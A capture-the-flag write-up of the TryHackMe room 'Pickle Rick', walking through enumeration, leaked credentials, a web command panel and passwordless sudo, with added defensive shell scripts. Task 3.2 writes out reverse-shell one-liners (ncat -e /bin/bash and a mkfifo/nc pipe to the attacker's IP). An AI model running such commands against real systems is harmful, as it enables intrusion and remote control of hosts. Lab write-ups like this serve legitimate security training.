This article is a write-up of the TryHackMe Room “Pickle Rick”. I will explain my way of tackling this room and show you the solution that worked for me. No flags will be shown!
Link to the room: https://tryhackme.com/room/picklerick
Time: 15-30 minutes, depending on your knowledge
- Connect to the TryHackMe VPN and find your IP address
- Start the room and note the IP address of your server
I suggest you create a variable for the IP address in your terminal instance; this makes it easier to follow my guide.
All commands are tested on a "fresh" Kali Linux installation. If you are using a different OS, you might need to change parts of these commands.
Task 1: What is the first ingredient Rick needs?
As always we want to start with enumerating the target. We will start with nmap to see the possible attack vectors.
┌──(diddy㉿kali)
└─$ nmap -sC -sV $IP
Starting Nmap 7.93 ( https://nmap.org ) at 2022-11-07 21:46 CET
Nmap scan report for 10.10.242.71
Host is up (0.037s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 77b416abb7da3568c0418343b10f3b37 (RSA)
|   256 300d26e4d9488c850140ccc3fe0af8ca (ECDSA)
|_  256 a666cb029cf4e6265829454c8f97bc2d (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Rick is sup4r cool
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.01 seconds
As we can see, the server has ports 22 and 80 open. Let's get gobuster and nikto running to check for interesting directories and other useful information. While these tools are running we can check out the website that is served on port 80.
There is nothing interesting at first glance, but if we check the source code we can find the first hint.
<!-- Note to self, remember username! Username: ********* -->
Nice, let’s write that down for later!
Nikto and gobuster should be done by now so let’s see what the result is:
┌──(diddy㉿kali)
└─$ nikto --url http://$IP
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.10.242.71
+ Target Hostname:    10.10.242.71
+ Target Port:        80
+ Start Time:         2022-11-07 21:49:39 (GMT1)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server may leak inodes via ETags, header found with file /, inode: 426, size: 5818ccf125686, mtime: gzip
+ Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
+ Cookie PHPSESSID created without the httponly flag
+ OSVDB-3233: /icons/README: Apache default file found.
+ /login.php: Admin login page/section found.
The last line from nikto looks interesting, let’s note that for later.
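Added example, not part of the original write-up: a POSIX shell check that reads a captured HTTP response and reports the three header weaknesses nikto listed above (missing X-Frame-Options, missing X-Content-Type-Options, session cookie without HttpOnly), so you can verify a fix from the defender's side. Both response texts and the function names are my own constructions.

```shell
#!/bin/sh
# Constructed response mirroring the nikto findings above (not a real capture).
SAMPLE_RESPONSE='HTTP/1.1 200 OK
Server: Apache/2.4.18 (Ubuntu)
Set-Cookie: PHPSESSID=constructedsessionid; path=/
Content-Type: text/html; charset=UTF-8'

# Constructed response after hardening (HttpOnly cookie, both headers present).
FIXED_RESPONSE='HTTP/1.1 200 OK
Server: Apache
Set-Cookie: PHPSESSID=constructedsessionid; path=/; HttpOnly; Secure; SameSite=Lax
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
Content-Type: text/html; charset=UTF-8'

# check_headers: read response headers on stdin, print one finding per line.
# Header names are matched case-insensitively, as HTTP requires.
check_headers() {
    headers=$(tr -d '\r')
    printf '%s\n' "$headers" | grep -qi '^x-frame-options:' \
        || echo 'MISSING: X-Frame-Options (clickjacking)'
    printf '%s\n' "$headers" | grep -qi '^x-content-type-options:[[:space:]]*nosniff' \
        || echo 'MISSING: X-Content-Type-Options: nosniff'
    # Report every Set-Cookie line that lacks the HttpOnly attribute.
    printf '%s\n' "$headers" | grep -i '^set-cookie:' | grep -vi 'httponly' \
        | sed 's/^[^:]*:[[:space:]]*/WEAK: /; s/=.*/ cookie set without HttpOnly/'
    return 0
}

# count_findings: number of findings for the headers on stdin (0 means clean).
count_findings() {
    n=$(check_headers | grep -c .)
    echo "$n"
}

echo "Findings for the vulnerable response:"
printf '%s\n' "$SAMPLE_RESPONSE" | check_headers
echo "Findings for the hardened response (expect none):"
printf '%s\n' "$FIXED_RESPONSE" | check_headers
```

On the stack seen here the fix belongs in Apache's mod_headers (`Header always set X-Frame-Options "DENY"`, `Header always set X-Content-Type-Options "nosniff"`) and in php.ini (`session.cookie_httponly = 1`).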
┌──(diddy㉿kali)-[~]
└─$ gobuster -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-small.txt dir -u http://10.10.242.71
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.242.71
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-small.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.3
[+] Timeout:                 10s
===============================================================
2022/11/07 21:55:26 Starting gobuster in directory enumeration mode
===============================================================
/assets               (Status: 301) [Size: 313] [--> http://10.10.242.71/assets/]
Progress: 81620 / 81644 (99.97%)
===============================================================
2022/11/07 22:01:42 Finished
===============================================================
Gobuster did not find anything useful. The /assets directory contains a few neat images and gifs but nothing that would help us here.
Let’s check out the login page.
While we do have a username, we do not have a password. We could use brute force, but there is one more place where we can check for hints. Most websites have a /robots.txt that tells crawlers which paths they may access and which they may not. Maybe there is something useful in that file? Indeed! While we cannot be 100% sure what it is, it looks like a password.
Together with the username we found earlier we should be able to log in.
We are greeted with a “Command Panel”. This command panel accepts bash commands and outputs the result. Let’s try some commands.
> ls
Sup3rS3cretPickl3Ingred.txt
assets
clue.txt
denied.php
index.html
login.php
portal.php
robots.txt
These two files look interesting, let’s see what’s inside them.
> cat Sup3rS3cretPickl3Ingred.txt
Okay, that did not work. Seems like cat is disabled. Let’s try something else.
> less Sup3rS3cretPickl3Ingred.txt
**. ****** ****
That works. We have our first ingredient. Now let’s see what the clue is.
> less clue.txt
Look around the file system for the other ingredient.
Alright, easy enough.
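Added example, not code from the room or from this write-up: it contrasts the keyword denylist the command panel appears to use (cat is refused, an equivalent reader is not) with an allowlist design in which the request carries an action name and user text is never handed to a shell. The function names and the action table are my own assumptions.

```shell
#!/bin/sh
# Denylist: refuse only when a banned word appears. This reproduces what the
# panel did above: "cat" is refused, but any other reader is accepted.
denylist_decide() {
    case "$1" in
        *cat*) echo "BLOCKED: $1" ;;
        *)     echo "ALLOWED: $1" ;;
    esac
}

# Allowlist: the request names an action, not a command. The server maps known
# names to fixed command lines it owns; anything else is refused. Shell
# metacharacters are rejected before the lookup as defence in depth.
allowlist_decide() {
    if printf '%s' "$1" | grep -q '[;|&<>()$`]'; then
        echo "REFUSED: shell metacharacters in request"
        return 0
    fi
    case "$1" in
        list_files) echo "RUN: ls -l /var/www/html" ;;
        disk_usage) echo "RUN: df -h /" ;;
        *)          echo "REFUSED: unknown action '$1'" ;;
    esac
}

# Constructed requests: what the panel accepted or refused above, plus the
# two actions the allowlist knows about.
for request in 'cat clue.txt' 'less clue.txt' 'list_files' 'list_files; id'; do
    printf 'denylist  %-16s -> %s\n' "$request" "$(denylist_decide "$request")"
    printf 'allowlist %-16s -> %s\n' "$request" "$(allowlist_decide "$request")"
done
```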
Task 2: What's the second ingredient Rick needs?
How about we check for all users with a home directory?
> ls /home
rick
ubuntu
> ls /home/rick
second ingredients
Looks like the second ingredient is located in the home directory of Rick. Let’s check it! Don’t forget to escape the space in “second ingredient”.
> less /home/rick/second\ ingredient
* **** ****
Alright, so far so good.
Task 3: What's the third ingredient Rick needs?
Now we only need to find the last ingredient. Since the final answer is usually located in the /root directory, we first need to escalate our privileges to the root user or find a way to execute commands with sudo permissions.
Now there are two ways that I found on how to access the last ingredient. I am not sure which one the intended way is but let's start with the easy one. If you are curious you can check out the "harder" one after this.
Task 3.1 The easy way
As per tradition, the last answer is located in the /root directory. This directory can only be accessed by the root user or a user with root privileges. A simple way to check whether a user has sudo permissions is to execute a command like ls with sudo. If there is any output, the user has sudo permissions.
> sudo ls
Sup3rS3cretPickl3Ingred.txt
assets
clue.txt
denied.php
index.html
login.php
portal.php
robots.txt
Yup, there is the output. Seems like the user running the web server (www-data) has sudo permission WITHOUT a password. That is bad. Let’s find the final ingredient.
> sudo ls /root
3rd.txt
snap
> sudo less /root/3rd.txt
3rd ingredients: ***** *****
With this answer we have completed the room. Nice!
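Added example, not part of the write-up: a small POSIX shell audit that reads sudoers text and flags the kind of grant that made this step trivial, a service account such as www-data with passwordless sudo. The sudoers content is constructed; the function name is my own. On a real host you would feed it the output of `sudo -l` or the files under /etc/sudoers.d, which only root can read.

```shell
#!/bin/sh
# Constructed sudoers sample (not taken from the room). The www-data line is
# the pattern observed above; the backup line is a narrower NOPASSWD grant.
SAMPLE_SUDOERS='# constructed sample
Defaults        env_reset
root    ALL=(ALL:ALL) ALL
%sudo   ALL=(ALL:ALL) ALL
www-data ALL=(ALL) NOPASSWD: ALL
backup  ALL=(root) NOPASSWD: /usr/bin/rsync
ubuntu  ALL=(ALL) ALL'

# audit_sudoers: read sudoers text on stdin, print one line per risky grant.
# Risky means NOPASSWD for any account other than root. A NOPASSWD grant to
# ALL commands is full root without a password, so it is reported as CRITICAL;
# a NOPASSWD grant restricted to named commands is reported as WARNING.
audit_sudoers() {
    grep -v '^[[:space:]]*#' | grep 'NOPASSWD' | while read -r line; do
        who=$(printf '%s' "$line" | awk '{print $1}')
        [ "$who" = "root" ] && continue
        case "$line" in
            *'NOPASSWD: ALL'*) echo "CRITICAL $who: passwordless sudo to ALL commands" ;;
            *)                 echo "WARNING $who: passwordless sudo for a restricted command list" ;;
        esac
    done
    return 0
}

printf '%s\n' "$SAMPLE_SUDOERS" | audit_sudoers
```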
Task 3.2 The hard way
Since I did not think that this room would give me the last answer that easily, I started an nc reverse shell with the command panel.
On my local machine I started an nc listener with:
> nc -lnvp $PORT
In the command panel I tried to execute this command to create the shell:
> ncat -e /bin/bash $YOURIP $PORT
The first command I tried was disabled, so I used this one: CREDIT
> rm -f /tmp/b; mkfifo /tmp/b; /bin/sh -i 2>&1 0</tmp/b | nc $YOURIP $PORT 1>/tmp/b
┌──(diddy㉿kali)
└─$ nc -lnvp 4444
listening on [any] 4444 ...
connect to [10.8.21.146] from (UNKNOWN) [10.10.242.71] 45248
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
$ hostname
ip-10-10-242-71
$
Next I tried to gain access to the root user with:
> sudo su
> whoami
root
And then finally I tried finding the third ingredient in the root directory.
> ls /root
3rd.txt
snap
> less /root/3rd.txt
3rd ingredients: ***** *****
Was it overkill? Yes. Was it way more fun? Absolutely!
That was the room “Pickle Rick”. I hope everything was clear. If not, please let me know. I will try to answer all questions that come up.